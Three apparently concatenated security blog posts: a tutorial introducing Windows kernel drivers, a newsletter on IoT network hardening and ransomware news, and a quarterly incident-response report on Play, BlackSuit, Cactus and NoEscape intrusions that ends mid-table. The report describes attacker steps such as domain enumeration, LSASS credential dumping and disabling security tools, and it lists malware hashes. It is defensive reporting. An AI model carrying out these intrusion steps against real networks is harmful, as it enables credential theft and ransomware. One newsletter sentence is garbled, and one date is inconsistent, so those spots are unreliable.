Drivers serve a critical background role in the Windows operating system, and most users will not directly interact with them past the initial installation or the occasional update. While the file structure may be similar to user-mode executables, they function quite differently. Unlike user-mode executables, drivers do not use the standard Win32 API routines, but rather “driver support routines,” which are provided by a set of kernel mode libraries and the interfaces of the manager components within the executive layer. 

Generally, drivers operate in kernel mode and facilitate communication between the operating system and hardware or connected devices. However, this is an oversimplification as there are many types of drivers and not all interface directly with hardware, such as filter drivers and software drivers. Some drivers operate within user mode, although for this blog series, we will focus on kernel-mode drivers only. For more information on driver types, we recommend referring to the Microsoft documentation.

In simple terms, a driver receives requests from clients and performs different actions in the system that are outside the direct capabilities of the client itself. These actions can include interfacing with hardware, manipulating threads or processes, network filtering and many others that require kernel-level access. In other words, drivers serve as conduits for instructions given to the operating system by bridging the gap between kernel mode and user mode.

Driver files

From a superficial standpoint, a driver is essentially a dynamic link library (DLL) that has the “.sys” file extension, although it differs greatly from typical DLL files. A driver cannot be executed in the same manner as other executable files and the functions and libraries that a driver imports are not available for use in user-mode applications. To run a driver, it must first be loaded into the operating system through a specific process that will be discussed later on in this series.

In many cases, a .sys file will initially be contained within a “driver package” along with a setup information (INF) file, a catalog (.cat) file and any other files the driver might require. An INF (.inf) file is a text file that provides Windows with all the necessary information it needs to install the driver such as version info, device IDs, driver files and .cat files. An example and overview of INF files can be found here in Microsoft's documentation. A catalog file contains the file hashes of the contents of the driver package, which Windows uses to verify the integrity of the files contained within the package.

How do drivers work?

Windows Driver Model and Frameworks

With the release of Windows 98 and Windows 2000, Microsoft released the Windows Driver Model (WDM), a fundamental model for device drivers that, among other features, eased the process of driver development. This new model made it easier to port a driver's source code between different versions of Windows, rather than having to write a separate driver for each version. This portability provided forward compatibility, which was not possible before its release. A WDM driver is not guaranteed to be backward compatible. However, older versions of Windows may not have the same features available.  

One of the downsides to WDM was that it does not inherently handle Plug and Play (PNP) or Power Management I/O requests, which increasingly became more common with hardware. This led to most developers copying boilerplate code that could handle these requests and using it in their drivers, which is a rather inefficient process.

To make writing a driver a more streamlined process, Microsoft introduced the Windows Driver Frameworks (WDF), also formerly known as Windows Driver Foundation. Providing developers with WDF removed the need for boilerplate code that used to be required for each driver. However, WDF itself is not a singular framework. It actually contains two distinct frameworks, KMDF (Kernel-mode Driver Framework) and UMDF (User-mode Driver Framework). WDF does not directly replace WDM, but provides a more efficient interface to WDM that simplifies some of the more complicated tasks.

Although Microsoft recommends using KMDF to develop kernel-mode drivers at the time of this writing, WDM can still be a viable option and is still the core model that Windows drivers are based upon. WDF adds a layer of abstraction to development which takes care of some of the more tedious aspects of writing a driver, however, it is beneficial to learn WDM, as it provides a clearer view of some of the actions that WDF performs behind the scenes. For this reason, the code examples in this blog series will be utilizing WDM. Additionally, it is valuable knowledge from a research and defense perspective, as it is still common for malicious drivers to be written using WDM. It is worth mentioning that in the case of developing production drivers, it is highly recommended to follow Microsoft’s guidance and standard practices

Driver code

Generally, Windows drivers are written in C, although with Visual Studio 2012 and Windows Driver Kit (WDK) 8, Microsoft began supporting C++. Some driver developers prefer C++, as it allows for easier resource management by using a concept called Resource Acquisition is Initialization (RAII). While RAII is outside the scope of this blog post, understanding what it is can be useful later on while learning about drivers.

An important difference between writing drivers and user-mode executables is that many of the memory operations for drivers must be done manually. In a user-mode application, any private allocated memory will be freed once the process terminates. Conversely, while writing a driver, memory must be manually allocated and freed accordingly, otherwise, it may result in a memory leak and cause unexpected issues. Special care should be taken to ensure all memory is appropriately handled while developing drivers.

To perform its basic operations, a driver must first implement its required “standard routines”. Without implementing each of these standard routines, a driver could not function:

Objects in Windows

Before diving into how a driver works, it is necessary to first introduce “objects,” one of the key concepts of the Windows kernel. 

The Windows OS is object-based, meaning the files, threads, executables and all the various components within the system are defined and represented as specific object types. 

Conceptually, representing an object as a defined type provides standardization and portability, as the structure of a defined type will always be the same regardless of what is interacting with it. The data held within a structure may change, but the definition of the structure itself cannot be changed, as it would then be a different object type by definition. 

Note: Object-based is not to be confused with object-oriented programming (OOP). While the Windows OS does implement some OOP principles, one term should not be conflated with the other.

As an example, the system represents the image of a loaded driver as an object type called DRIVER_OBJECT, and the different members of the structure represent and contain its corresponding attributes, such as DriverSize and DriverName. 

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers
DRIVER_OBJECT structure (from MSDN).

You will encounter many types of objects while learning about drivers or the kernel, and documentation for many can be found on the MSDN website. MSDN is the most important resource available while learning about the Windows operating system. Additionally, searching for an object type or function name in a search engine can provide helpful information, as there are several undocumented functions and data types. 

DriverEntry

The most immediate requirement for a driver’s code is that it must have an entry routine, typically named DriverEntry. The first routine that is called once a driver is loaded. There are multiple required responsibilities that DriverEntry must take care of: 

  • Implementing the other standard routines.
  • Implementing dispatch routines and assigning their entry points.
  • Creating and initializing required resources, objects and devices.
  • Freeing memory that is no longer required.
  • Providing an NTSTATUS return value.   

DriverEntry takes two parameters: DriverObject and RegistryPath. 

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers
DriverEntry prototype (from MSDN).

The RegistryPath parameter is a pointer to a Unicode string that contains the registry path to the driver's “parameters” key in the registry, which is created when the driver is initially installed on the system. The key typically contains configuration information that the driver might require, depending on how the driver was written. 

The DriverObject parameter is a pointer to a structure defined as DRIVER_OBJECT, which represents the kernel-mode driver itself and contains information about the driver within its members. DRIVER_OBJECT is partially opaque, meaning that not all of its members are viewable to the user.  

The example below shows what a typical DriverEntry function might look like written in C++:

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

In this example, DriverEntry simply returns an NTSTATUS value of STATUS_SUCCESS once it has finished executing.

As mentioned earlier, DriverEntry must also create and initialize the required resources, objects, or devices that the driver needs. For demonstration purposes, this driver needs to initialize and create a device object and a symbolic link.

For a driver to receive requests from a client it must create a device object, which is represented as the structure DEVICE_OBJECT

“The DEVICE_OBJECT structure is used by the operating system to represent a device object. A device object represents a logical, virtual, or physical device for which a driver handles I/O requests.” - MSDN 

A device object can be thought of as an interface for requests between a client and a driver. Instead of sending a request directly to a driver, a device object acts as the communication point for a client. Creating a device object is done by initializing a PDEVICE_OBJECT structure and then passing it to the IoCreateDevice function as the DeviceObject parameter. A name for the device represented as a Unicode string is also supplied and passed as the DeviceName parameter. 

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers
IoCreateDevice prototype (from MSDN).

Now, a symbolic link can be initialized and created using the device object name by calling the IoCreateSymbolicLink function. A symbolic link — or symlink — is linking a device object name to a specified name that will be viewable to users. 

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers
Creating a device object and symbolic link.

After setting up the device object and symlink, the driver is now ready to implement its dispatch routines — the functions that process the different requests that a driver might receive.  

Unload routine

Another required section of code is a DriverUnload routine, a function that determines what operations will be performed once a driver is unloaded. This will commonly include deleting device objects and symbolic links created by the driver or performing any cleanup that may be necessary. 

In DriverEntry, the unload routine must be declared by assigning it to the DriverUnload member of the DriverObject structure. In this example, the device object and symlink will be deleted.

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

Dispatch routines and function codes

An important member of the DRIVER_OBJECT structure to understand is MajorFunction. This member is defined as PDRIVER_DISPATCH – a pointer to a DRIVER_DISPATCH structure –  and contains an array of entry points for a driver's dispatch routines; effectively a list of operations that a given driver supports. Dispatch routines are functions within a driver that are called when it receives a system-defined “function code”, also known as a “MajorFunction code.” As can be seen in the list below, each one has the prefix “IRP_MJ_”:

Common MajorFunction codes:

It is worth noting that while the majority of function codes start with “IRP_MJ_”, there are some that use the prefix “IRP_MN_” which indicates that it is a MinorFunction, a subordinate of a related MajorFunction. As an example, IRP_MN_SET_POWER is a subordinate of IRP_MJ_POWER. A more complete list of Major- and MinorFunction codes can be found here in the Microsoft documentation.

Function codes essentially serve as instructions for a driver to perform certain actions by request. To be able to handle function codes, a driver must assign a dispatch routine entry point to the appropriate MajorFunction code within the DriverObject structure. This assignment takes place in the DriverEntry routine, and as can be seen below, each dispatch routine is assigned to a specific function code:

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

For example, if the driver in the example above receives a request that contains the function code IRP_MJ_CREATE, it would then execute the dispatch routine TestDriverCreate. Below is an example of what the TestDriverCreate routine could look like:

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

IRP_MJ_CREATE is an important function code as it must be handled by every driver, whether it makes use of it or not. In the TestDriverCreate function shown above, the function code is handled by doing nothing at all and then completing the request by calling IoCompleteRequest. A more detailed explanation for handling requests will appear later in this blog series. For demonstration purposes this example intentionally has no functionality; however, in a real driver there might be actions performed when handling this function code. 

The second parameter of the TestDriverCreate function, “PIRP Irp”, refers to a critical structure used in the operation of drivers: the I/O request packet, also known as an “IRP”.

The I/O system and I/O request packets (IRPs)

To manage the flow of requests to drivers, among other operations, Windows implements what is called the I/O (input/output) system. This system is responsible for facilitating the flow of data between drivers, peripheral devices and any client making a request to a driver. The data — including major function codes — is encapsulated in what is called an “IRP,” short for “I/O request packet,” represented as a structure defined as _IRP.

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers
_IRP structure (from MSDN).

As part of the I/O system, the I/O manager serves as an interface to kernel-mode drivers by creating and sending IRPs to drivers, which can contain a function code for the receiving driver to act upon. However, the I/O manager is not the only source of IRPs, as they can be created by other managers in the Executive layer, and in some cases, they may be created by a driver. Creating IRPs is not the only function of the I/O manager. It is also responsible for creating a driver object for each installed driver.

As mentioned earlier, the I/O system plays a large role in the operations of drivers, and it is worth becoming familiar with its components. In our next entry in this series, we will expand on the topic of IRPs and the I/O system and their relation to drivers. Device stacks and IOCTLs will also be introduced. Later in the series, we will also walk through the process of loading and debugging a driver, eventually leading to malicious driver behavior and analysis. 

Until the next entry in this series, we recommend exploring the links provided throughout this blog. The basic concepts surrounding drivers and the kernel environment will become familiar with exposure to them, as well as reading the documentation or relevant research. Below is a list of recommended readings that will provide invaluable information on how drivers are written and the way they work.

Books

  • Windows Kernel Programming by Pavel Yosifovich
    • Fantastic in-depth overview of Windows kernel programming.
  • Windows NT Device Driver Development by Peter Viscarole, W. Anthony Mason
    • Older Windows device driver development book, but still has a large amount of currently relevant information.
  • Windows Internals: Part 1 & 2  by Pavel Yosifovich, Mark E. Russinovich, Alex Ionescu, David A. Solomon
    • Official book of Windows internals by Microsoft. Does not focus on the kernel but is a good reference to own.

What to do with that fancy new internet-connected device you got as a holiday gift

18 January 2024 at 19:00
What to do with that fancy new internet-connected device you got as a holiday gift

Welcome to 2024! 

The Threat Source newsletter is back after our winter break. 

When I wasn’t spending my downtime chasing around my toddler, one of my main projects was to upgrade the internet connection at my house. My ISP started offering Gigabit speeds and a 60 GHz connection, which was appealing to me as someone who is always on a quest to find the best way to stream PS5 games to my Steam Deck. 

This sent me down a path of reconfiguring my home network and re-adding a bunch of devices to a new network. And even though this sounds like a totally basic skill for anyone who works in cybersecurity, it was a big deal for me to set up a separate IoT-only network. 

Many readers may have even gotten a new IoT device for a holiday gift. This mobile projector was featured on several “Top Gifts of 2023” lists I was looking at in December, and there are always the slam dunk gifts of a new home AI assistant like Google Home or the Amazon Echo Show to control all things “smart” in your home. 

And we all know that, by being connected to the internet, many of these IoT devices are going to be vulnerable to adversaries. Last week, researchers found a network-connected torque wrench used in many industrial environments could be infected with ransomware.  

There are many examples of WiFi-enabled home cameras, assistants and doorbells vulnerable to a wide range of security issues, so I don’t think I need to run down those dangers in this newsletter. I wanted to take this space to share a few reminders and best practices of how to best set up these devices and manage them. This is a topic I covered previously in video format a few years ago, but I’m sure much of the UI/UX in this tutorial has changed since then, and I feel like I learned quite a bit from “YouTube University” over the past week or so in my own journey. 

  • Use network mapping software to track which devices connect to your network using what communication methods. NetworkMaps is a free, open-source option that I used when I was taking cybersecurity courses online.  
  • Create an IoT-specific network. This was super easy for me to do with the Gigabit-enabled router my ISP sent me, but I set up a network specifically for these devices to connect to (like my baby monitor, smart TVs, etc.) with a completely different network name and password from my “main” network. This keeps these devices segmented so that, if a bad guy is lurking, they stay on that IoT-specific network that doesn’t talk to your more sensitive devices like a work laptop. 
  • Make sure your router’s firewall is enabled, disable WPS and enable the WPA2 or WPA3 security protocol. 
  • Immediately change the default usernames and passwords that come with any new WiFi-connected device you’re setting up. 
  • Any home routers or IoT devices could point to OpenDNS servers for an additional (and free!) layer of security.
  • Disable any additional features or data-sharing you feel like you don’t need. The prime example of this for me is Amazon Sidewalk, the community network that allows Amazon devices to talk to one another and send alerts to users about various goings-on in their respective communities. The main drawback for me is that it allows your neighbors to pull off just a little of your internet bandwidth for their connected devices, too, and opens a whole slew of privacy concerns. 

The one big thing 

Cisco Talos recently worked with fellow security company Avast to release a new version of the decryptor for the Babuk ransomware. Our researchers obtained executable code capable of decrypting files affected by the Babuk Tortilla ransomware variant, allowing Talos to extract and share the private decryption key used by the threat actor in its latest variant. 

Why do I care? 

Babuk is one of the most prevalent ransomware families in the wild right now, so any additional resources for victims to potentially recover faster, and for free, is good news. And Dutch Police, acting on threat intelligence supplied by Talos, identified, apprehended and the Dutch Prosecution Office prosecuted the threat actor behind Babuk Toa bad guy is lurkingtilla operations, demonstrating the power of cooperation between law enforcement agencies and commercial security organizations such as Talos and Avast.  

So now what? 

The newest version of the decryptor is now available through No More Ransom, or directly on Avast’s website. Continued action from law enforcement to track down, apprehend and charge the operators behind ransomware is one of the many important steps we can take as a society and security community to reduce the prevalence of ransomware. 

Top security headlines of the week 

Security researchers are warning of actively exploited vulnerabilities in the Ivanti Connect Secure VPN that, as of Wednesday, still did not have a patch available. The vulnerabilities are an authentication bypass flaw (CVE-2023-46805) and a command injection issue (CVE-2024-21887). An adversary could chain these vulnerabilities to execute arbitrary commands on the targeted appliance. Incident response firm Volexity said earlier this week that government agencies and military branches across the globe, as well as several Fortune 500 private companies. Chinese state-sponsored actor UTA0178 is suspected to be behind the exploitation of these vulnerabilities, some dating back to December. Ivanti says it is still developing patches for these issues, one of which may not be available until mid-February. In the meantime, users should follow the mitigation steps outlined by Ivanti, and implement a new scanner that can detect exploitation attempts. (DarkReading, SecurityWeek

Britain’s national library is working to restore its online services 11 weeks after a cyber attack, though a full recovery may take until the end of the year. The British Library started restoring read-only versions of its online catalog last week, including records of printed and rare books, maps, journals and music scores. The Rhysida ransomware group initially took credit for the attack in October 2023, claiming it was offering personal information for sale on the dark web. The library eventually confirmed that some employee data had been stolen in the attack, and it had to temporarily take its entire catalog offline. The attack also held up the payment system for which the library rewards authors and creators each time one of their works is checked out. (The Guardian, The New York Times

Chinese government officials have apparently found a way to de-anonymize Apple AirDrop users to track anyone sharing content that’s outlawed by the country. AirDrop is normally encrypted, and has been used previously to share messages, content and art with other iPhone users in public that is against the ruling Communist Party in China. But the Beijing municipal government's justice bureau says China-backed experts have found a way to carry out a complex encryption attack to reveal the original sender of the messages and prosecute them. In November 2022, Apple updated AirDrop settings so users in China could only opt-in to receive files from unknown contacts during a 10-minute window before it automatically shut off. The feature did not previously have a time limit. Translations of government statements indicate that the method involves what are known as “rainbow tables” to defeat the measures AirDrop has in place to obfuscate users' phone numbers and email addresses. (Ars Technica, CBS

Can’t get enough Talos? 

Most prevalent malware files from Talos telemetry over the past week  

SHA 256: b8aec57f7e9c193fcd9796cf22997605624b8b5f9bf5f0c6190e1090d426ee31 
MD5: 2fb86be791b4bb4389e55df0fec04eb7 
Typical Filename: KMSAuto Net.exe 
Claimed Product: KMSAuto Net 
Detection Name: W32.File.MalParent 

SHA 256: 36efad0617db0d45de00cc4f3cf49af7c2d6b5b15ca456d13703b5d366c58431 
MD5: 147c7241371d840787f388e202f4fdc1 
Typical Filename: EKSPLORASI.EXE 
Claimed Product: N/A  
Detection Name: Win32.Generic.497796 

SHA 256: 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab 
MD5: 4c648967aeac81b18b53a3cb357120f4 
Typical Filename: yypnexwqivdpvdeakbmmd.exe 
Claimed Product: N/A  
Detection Name: Win.Dropper.Scar::1201 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll 
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

SHA 256: 39b0d4bad98713924775595834f1e07598a12c2622977578739222e09766066c 
MD5: a543017b4fa809e9f6b7251e7c14a5b0 
Typical Filename: a543017b4fa809e9f6b7251e7c14a5b0 
Claimed Product: N/A   
Detection Name: Auto.39B0D4BAD9.232061.in07.Talos 

IR Q4 2023 trends: Significant increase in ransomware activity found in engagements, while education remains one of the most-targeted sectors

24 January 2024 at 13:00

First time ransomware was the top threat in 2023, according to Q4 2023 Talos Incident Response report

IR Q4 2023 trends: Significant increase in ransomware activity found in engagements, while education remains one of the most-targeted sectors

Ransomware, including pre-ransomware activity, was the top observed threat in the fourth quarter of 2023, accounting for 28 percent of engagements, according to Cisco Talos Incident Response (Talos IR), notably a 17 percent increase from the previous quarter

Talos IR observed operations involving Play, Cactus, BlackSuit and NoEscape ransomware for the first time this quarter. 

As reflected in Talos IR’s quarterly report for the third quarter of 2024, the team responded to many incidents with miscellaneous post-compromise activity, though these attacks were limited in scale and contained by security efforts early in the attack chain before the adversary’s objectives could be fully determined. Other substantial threats this quarter included an insider threat attack and phishing campaigns, including a phishing cluster using malicious QR codes. 

IR Q4 2023 trends: Significant increase in ransomware activity found in engagements, while education remains one of the most-targeted sectors

Education and manufacturing were tied for the most targeted verticals, together accounting for nearly 50 percent of the total number of incident response engagements, closely followed by healthcare and public administration. Compared to last quarter, we observed only a slight increase in engagements targeting the education sector while there was a 10 percent increase in engagements affecting the manufacturing vertical.

Adversaries commonly target entities in the education sector to conduct ransomware attacks or access sensitive student and faculty personally identifiable information (PII), such as financial data and credentials. Schools with limited cybersecurity capabilities and constrained resources are often the most vulnerable, as security remains a cost center. However, the opportunistic targeting employed by adversaries can still put school districts with robust cybersecurity programs at risk. Exfiltrated PII data remains an attractive target that is leveraged for follow-on attacks, sold on dark web forums, or used for monetary theft. 

The manufacturing sector faces unique challenges due to its inherently low tolerance for operational downtime. The sector's crucial role in producing goods fundamental to various other critical infrastructure sectors means that any disruption in manufacturing processes not only affects the industry itself but may have cascading effects on the supply chain and dependent sectors. Supply chain attacks are a concern for the manufacturing sector, as such incidents can create unstable supply chain conditions that require immediate attention and action to protect assets, operations and/or reputation.

IR Q4 2023 trends: Significant increase in ransomware activity found in engagements, while education remains one of the most-targeted sectors

Ransomware activity increases

Play ransomware

Talos IR responded to a Play ransomware attack for the first time this quarter where adversaries used the legitimate remote access software AnyDesk to deepen their access and remain persistent. The adversaries used PsExec, an IT administration utility that allows users to execute programs on another computer, to disable security tools across multiple endpoints, likely to evade detection. After collecting credentials from various locations such as the Windows Registry, the attackers were able to compromise multiple domain controllers which were used to deploy ransomware across the environment. 

In another Play ransomware engagement, Talos IR assessed with low confidence that after obtaining user credentials, the attackers attempted to bypass multi-factor authentication (MFA) by calling the organization’s help desk to register a new MFA device. This is an example of “vishing,” a social engineering technique in which attackers try to trick victims over the phone. While Talos is aware of other ransomware and cybercriminal groups who use vishing to gain initial access, it is not a technique we had previously associated with Play ransomware affiliates. Attackers also leveraged the open-source Windows password spraying tool SharpSpray and IP addresses associated with SurfShark and BlueVPS virtual private network (VPN) and virtual private server (VPS) providers. These methods and tools leveraged by Play affiliates are not well-documented in open-source reporting, suggesting these may be newly adopted techniques.  

🎥
Want to hear these insights directly from our Talos Incident Responders? Watch the latest On Air video below!

Once inside the network, the adversaries executed several enumeration commands, such as "whoami" and "net group /domain," which provide information about the system owner and permission groups. Next, they dumped credentials from the memory of the Local Security Authority Subsystem Service (LSASS) and moved laterally by abusing Remote Desktop Protocol (RDP). A combination of the archive tool WinRAR and the open-source file transfer protocol (FTP) tool WinSCP was used for data exfiltration. Talos IR identified several persistence mechanisms deployed by the threat actors, including scheduled tasks and registry startup items. Before the execution of the ransomware binary, the attackers disabled several security tools and deleted the volume shadow copies to evade detection and inhibit system recovery. 

First discovered in June 2022, Play (also known as Playcrypt) ransomware group has targeted over 300 organizations across the globe within the public and private sectors. Play affiliates typically compromise victim networks and append the “.PLAY” extension when encrypting files. Initial access vectors leveraged in Play attacks vary from social engineering to exploiting vulnerabilities in public-facing applications.

BlackSuit ransomware

In a ransomware engagement, Talos IR responded to a BlackSuit ransomware incident for the first time where threat actors used stolen VPN credentials to gain access to an account that did not have MFA enabled. Attackers enumerated the network and permission groups before dumping credentials from memory with the credential harvesting tool Mimikatz. Attackers exploited the privilege escalation vulnerability dubbed "ZeroLogon," tracked as CVE-2020-1472, which allows remote unauthenticated attackers to access domain controllers and obtain domain administrator access. The legitimate remote access software ScreenConnect was also used for command and control (C2) communication throughout the attack. 

First discovered in May 2023, BlackSuit ransomware is suspected to be a rebrand of the Royal ransomware operation. Royal, first discovered in September 2022, was hypothesized to be the successor to the Conti ransomware operation that voluntarily shut down in May 2022. Royal and Conti were known for heavily targeting several critical infrastructure sectors, including manufacturing, healthcare and public health (HPH), and education. The BlackSuit ransomware operation has followed this pattern and has been heavily targeting the education sector throughout 2023, which will likely continue into 2024 as the group has already posted a victim in the education industry since the start of the new year. 

Cactus ransomware

Talos IR responded to a Cactus ransomware attack for the first time this quarter in an engagement where the adversaries gained access using compromised credentials for a VPN account that was not secured with MFA. Throughout the attack, the adversaries created multiple accounts and added them to the administrator's group, which were then used to evade detection, escalate privileges, and remain persistent in the environment. Attackers moved laterally in the environment by abusing RDP, scheduled tasks, and Windows Management Instrumentation Command (WMIC), techniques commonly observed across similar ransomware attacks. The security registry key file, which contains account policies, user permissions, and encrypted versions of passwords, was duplicated by the threat actors but renamed backward to “ytiruces.” By copying this file, attackers might be trying to maintain access to the credentials, which they can decrypt and use later. Talos IR observed a few other duplicate registry files with reverse names, which could have been a tactic used to mark files that have already been exfiltrated or analyzed.

First discovered in March 2023, Cactus works as a ransomware-as-a-service (RaaS) and is known to exploit vulnerabilities and leverage malvertising lures for initial access. Cactus ransomware targeting and victimology appear to be opportunistic and indiscriminate, appending the file extension “.cts1” to the end of encrypted files, with the numerical value varying between victims. Talos IR observed Cactus ransomware affiliates using custom scripts to disable security tools and distribute the ransomware. 

NoEscape ransomware

Talos IR also responded to NoEscape ransomware for the first time this quarter in an engagement in which threat actors leveraged the “Citrix Bleed” authentication bypass vulnerability in Citrix NetScaler web application delivery control (ADC) and Gateway appliances, which Citrix released a patch for in October 2023. Tracked as CVE-2023-4966, this vulnerability allows attackers to bypass password and MFA requirements by obtaining session tokens. While exploitation of CVE-2023-4966 represents a new vulnerability leveraged by NoEscape ransomware affiliates, the targeting of Citrix Bleed is consistent with the group’s previous attacks against virtual desktop infrastructure, and appears to be part of a broader mass campaign initially led by LockBit 3.0 ransomware affiliates. In addition to patching affected systems, Talos also recommends invalidating all active session tokens because if any of the session tokens are stolen they can still be abused by attackers leaving the organization vulnerable to attacks. 

After the NoEscape affiliate gained access to the environment, they installed several persistence mechanisms including the ITarian remote monitoring and management (RMM) solution, a remote access utility Talos IR has not previously seen ransomware affiliates use. The adversary leveraged the access granted by ITarian and other tools to steal additional privileged credentials and lay the groundwork for future ransomware deployment. ITarian is highly similar to other RMMs commonly seen in Talos IR ransomware engagements such as TeamViewer, Atera, AnyDesk and Syncro that can access files or workstations remotely. The affiliate also used several other tools commonly seen in pre-ransomware activities, including Cobalt Strike and Sliver, two penetration testing and red team toolkits frequently used for persistence, code execution and lateral movement. The use of Sliver is interesting in that Talos IR has not seen it used in ransomware attack chains since late 2022. The Sliver implants were packed using PEzor, a tool that obfuscates the executables’ contents to prevent anti-virus detection and blocking. Attackers leveraged PsExec to copy and execute two ransomware payloads across the network. 

NoEscape is a RaaS that emerged in May 2023 and has used multiple extortion tactics including data theft and distributed denial-of-service (DDoS) attacks to coerce payments from victims. NoEscape operates a profit-sharing model where the ransom proceeds are split between the ransomware’s developers and the affiliates/customers who pay to use it. Consistent with many RaaS groups, NoEscape has indiscriminately targeted organizations of all sizes across many different industries. In December 2023, Talos began monitoring claims on the dark web that NoEscape’s developers executed an “exit scam” in which they stole several of their affiliates' deposits and ransom payouts before possibly shutting down their operation. NoEscape’s leak site was taken down on Dec. 9, 2023, and continues to be offline. 

On Dec. 19, 2023, the Federal Bureau of Investigation (FBI) announced a disruption campaign against the ALPHV (BlackCat) ransomware operation, which had been active since late 2021. Although not observed by Talos IR this quarter, ALPHV was one of the most prolific ransomware groups in 2023 following LockBit ransomware. Talos assesses recent law enforcement efforts that may divert additional resources to the LockBit ransomware group, significantly improving their capabilities. Notably, the LockBit ransomware group posted on a Russian-speaking dark web forum in December 2023 offering to recruit ALPHV and NoEscape affiliates as well as any of the ALPHV developers. With a current lack of intelligence regarding this new strategy, it is too early to determine if any of the prospective ALPHV affiliates considered, or moved over to LockBit. However, if ALPHV and LockBit were to collaborate, this potential amalgamation of tactics, techniques and operational capabilities would likely result in more potent and evasive ransomware variants, complicating detection and mitigation efforts, and likely significantly altering the ransomware landscape as we move through the new year. 

Other observed threats

In an insider threat engagement, a disgruntled former employee whose account was not properly decommissioned remotely removed all configurations on a network switch before rebooting it, which functionally restored the switch to its factory default configuration. A switch is a piece of hardware that connects network devices and helps manage all of the traffic. When a switch fails, it can lead to network downtime, loss of productivity, and potentially expose the network to security risks. Talos recommends organizations implement secure off-boarding procedures to protect the confidentiality, integrity and availability of sensitive data. 

In one cluster of phishing activity, several employees received spear phishing emails with malicious QR codes that, when scanned, led to a fake Microsoft 365 sign-in page, consistent with a growing trend in public reporting. Once the attackers obtained stolen credentials, they proceeded to use an MFA exhaustion attack that resulted in some employees approving the push notifications on their mobile devices. In an MFA exhaustion attack, an adversary hopes to overwhelm users with MFA push notifications in hopes they will inadvertently grant access. 

Phishing attacks leveraging QR codes are concerning because if successful, employees will likely use their mobile devices, which leads defenders to lose visibility. Additionally, most email security solutions, such as secure email gateways (SEGs), cannot detect malicious QR codes. With remote work expanding after the COVID-19 pandemic, more employees are accessing business information from their mobile devices. According to a 2023 report, by cybersecurity firm Agency, 97 percent of respondents access their work accounts from their devices. Talos recommends organizations deploy a mobile device management (MDM) platform or similar mobile security tool, such as Cisco Umbrella, to all unmanaged mobile devices that have access to business information. 

There was a significant increase in QR code phishing in 2023, according to public reporting. Talos IR responded to a QR code phishing campaign for the first time in an engagement where threat actors tricked victims into scanning malicious QR codes embedded in phishing emails with their mobile devices, thereby leading to malware being executed on the mobile devices. As a result, the attack surface shifts as enterprise security protocols and monitoring systems have less control and visibility over personal devices compared to corporate-managed hardware outside of corporate networks. Additionally, most email security solutions, such as secure email gateways (SEGs) are currently unable to detect malicious QR codes.

Initial access 

The top observed means of gaining initial access was tied between using compromised credentials on valid accounts and exploiting public-facing applications, each accounting for 28 percent of engagements, closely followed by phishing. In the phishing engagements this quarter, Talos IR observed a mix of malicious links and QR codes leading to fake login sites crafted to steal credentials. 

IR Q4 2023 trends: Significant increase in ransomware activity found in engagements, while education remains one of the most-targeted sectors

Security weaknesses

A lack of MFA or proper MFA implementation across all user accounts as well as misconfigured or unpatched systems each played a part in 36 percent of the engagements Talos IR responded to this quarter. Talos IR frequently observes attacks that could have been prevented if MFA was enabled on critical services, such as RDP. Talos IR recommends expanding MFA for all user accounts (e.g., employees, contractors, business partners, etc.). 

In some engagements, adversaries attempted to bypass MFA with MFA exhaustion, or fatigue, attacks. Users must have a clear understanding of the appropriate business response protocols when their devices are overwhelmed with an excessive volume of push notifications. We recommend organizations educate their employees about the specific channels and points of contact for reporting these incidents. Prompt and accurate reporting enables security teams to quickly identify the nature of the issue, and implement the necessary measures to address the situation effectively.

Staying up to date with software updates is a crucial aspect of an organization’s security posture, as outdated systems present exploitable avenues for attackers to leverage. Attackers often exploit these software vulnerabilities to achieve a multitude of post-compromise objectives, such as privilege escalation and lateral movement. While vulnerability and patch management are critical, it is not always possible to immediately apply every security patch due to the complexity of enterprise networks. Talos IR recommends prioritizing vulnerabilities that pose the biggest threats to prevent exploitation. 

Top observed MITRE ATT&CK techniques

The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements and includes relevant examples. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic based on the way they were leveraged. Please note, this is not an exhaustive list. 

Key findings from the MITRE ATT&CK framework include: 

  • Exploitation of public-facing applications was one of the top observed means of gaining initial access this quarter, accounting for 28 percent of total engagements, a slight increase from the previous quarter.
  • Remote access software, such as ScreenConnect, SplashTop and AnyDesk were used in nearly a fourth of engagements this quarter. 
  • Indicator removal, such as clearing Windows event logs and file deletion, was the top defense evasion technique observed.
  • In 24 percent of engagements, attackers abused remote services, such as RDP, SSH, and SMB, to move laterally.  

Initial Access (TA0001)

Example

T1190 Exploit Public-Facing Application

Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet  

T1078 Valid Accounts

Adversary leveraged stolen or compromised credentials

T1566 Phishing

Malicious email sent to trick users into downloading malware

Execution (TA0002)

Example

T1059.001 Command and Scripting Interpreter: PowerShell

Executes PowerShell code to retrieve information about the client’s Active Directory environment

T1059.003 Command and Control Scripting Interpreter: Windows Command Shell

Web shells can run commands on the compromised machine

Persistence (TA0003)

Example

T1053.005 Scheduled Task / Job: Scheduled Task

Scheduled tasks were created on a compromised server

T1136 Create Account

Created a user to add to the local administrator’s group

T1133 External Remote Services


Adversaries use compromised credentials to log into VPNs

Defense Evasion (TA0005)

Example

T1218.011 System Binary Proxy Execution: Rundll32

Attackers can execute malicious DLL files with Rundll32

T1134.002 Access Token Manipulation: Create Process with Token

Attackers created a new process using the command “run as”

T1562.001 Impair Defenses: Disable or Modify Tools

Attackers can disable Windows Defender

Credential Access (TA0006)

Example

T1003.001 OS Credential Dumping: LSASS Memory

Use “lsass.exe” for stealing password hashes from memory

T1003.003 OS Credential Dumping

